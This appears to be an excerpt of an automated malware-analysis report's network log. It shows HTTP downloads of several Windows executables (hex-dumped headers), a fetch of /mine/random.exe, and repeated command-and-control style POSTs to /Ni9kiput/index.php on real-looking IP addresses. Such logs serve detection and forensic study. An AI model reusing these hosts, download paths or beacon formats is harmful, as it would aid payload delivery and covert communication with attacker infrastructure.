                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:51:54 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 23:40:43 GMTETag: "6b400-62fc9269d5733"Accept-Ranges: bytesContent-Length: 439296Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 24 13 cb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 b7 9f 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ea f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 12:55:15 GMTETag: "1f8e00-62fc0224abf6e"Accept-Ranges: bytesContent-Length: 2067968Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 eb dd c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d2 04 00 00 ae 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 f5 e9 1f 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 10 06 00 6b 00 00 00 00 00 06 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 11 06 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 05 00 00 10 00 00 00 f0 05 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 00 06 00 00 02 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 06 00 00 02 00 00 00 02 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 29 00 00 20 06 00 00 02 00 00 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 68 65 68 77 6d 63 00 70 19 00 00 f0 2f 00 00 62 19 00 00 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 6f 65 6c 78 6c 6f 61 00 10 00 00 00 60 49 00 00 04 00 00 00 68 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 49 00 00 22 00 00 00 6c 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:14 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 27 Feb 2025 10:26:42 GMTETag: "57a00-62f1d204740f0"Accept-Ranges: bytesContent-Length: 358912Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 57 3c bc d1 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 24 03 00 00 04 00 00 00 00 00 00 fe 41 03 00 00 20 00 00 00 60 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 7c e5 05 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 41 03 00 4b 00 00 00 00 60 03 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 6b 41 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 22 03 00 00 20 00 00 00 24 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 00 00 00 00 60 03 00 00 02 00 00 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 2a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 63 73 73 00 00 00 00 28 4c 02 00 00 a0 03 00 00 4e 02 00 00 2c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 08 Mar 2025 14:52:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 08 Mar 2025 05:38:10 GMTETag: "1ac00-62fce24f7ee2b"Accept-Ranges: bytesContent-Length: 109568Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1f 51 ff ad 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 22 00 00 00 08 00 00 00 00 00 00 66 3b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 02 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 3b 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 80 3a 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 20 00 00 00 20 00 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 7e 01 00 00 a0 00 00 00 7e 01 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                    Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 176.113.115.7Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 42 32 38 37 34 42 30 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7CBB2874B05982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                    Source: global trafficHTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
